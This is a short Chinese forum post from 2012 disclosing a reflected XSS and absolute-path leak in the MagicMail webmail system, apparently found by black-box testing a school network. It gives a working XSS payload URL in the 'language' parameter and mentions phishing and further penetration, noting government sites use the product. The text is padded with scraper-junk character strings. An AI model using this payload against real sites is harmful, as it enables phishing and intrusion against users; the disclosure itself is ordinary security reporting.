今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
) ` r* f0 A3 C! h& _& e
( K1 q' ^& F4 _) @7 E
) Y2 Y& \* L; x, t; L/ s包含 一个反射性XSS 以及 绝对路径泄漏
" V" R) ?% T5 m' m; S. s看了看 貌似全部是linux的。
* @$ F) v0 _. I' g1 u ! o8 [* b4 g1 ~2 C" [
关键字:迈捷邮件系统 by MagicMail7 Q) ]6 \7 Y1 ~8 v" _, H
9 R4 E& s( G* Q( i9 W/ p% Q
可以看到很多政府网站都用这个邮件系统6 y. r! m1 [+ b4 a% e
! M8 U f+ j3 l绝对路径 http://madman.in/index.php?login_type=declare&language=5 s- R8 m) O& E% m8 ~: W* B
( F7 Q; v# b7 I; }% @/ J( O1 J+ b* H( c/ m4 t
1 P+ p3 u# L/ \! G% q
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
( S- Q6 F* V) F& U( o* A: S$ K4 w
3 e- F) }8 {% f! s4 x
( [/ `( p2 B5 l" V: k# L9 l# h0 q
) y7 N# Y1 | `$ W9 J) d虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等: W- M6 ^4 q! _+ t* L5 @0 Z9 p v) x
' e4 ~ B, V7 ]6 ?/ p
修复方案:看官方补丁吧。9 B- z0 N" Q* G. J0 J
|
发表于 2012-11-9 20:38:41
收藏
支持
反对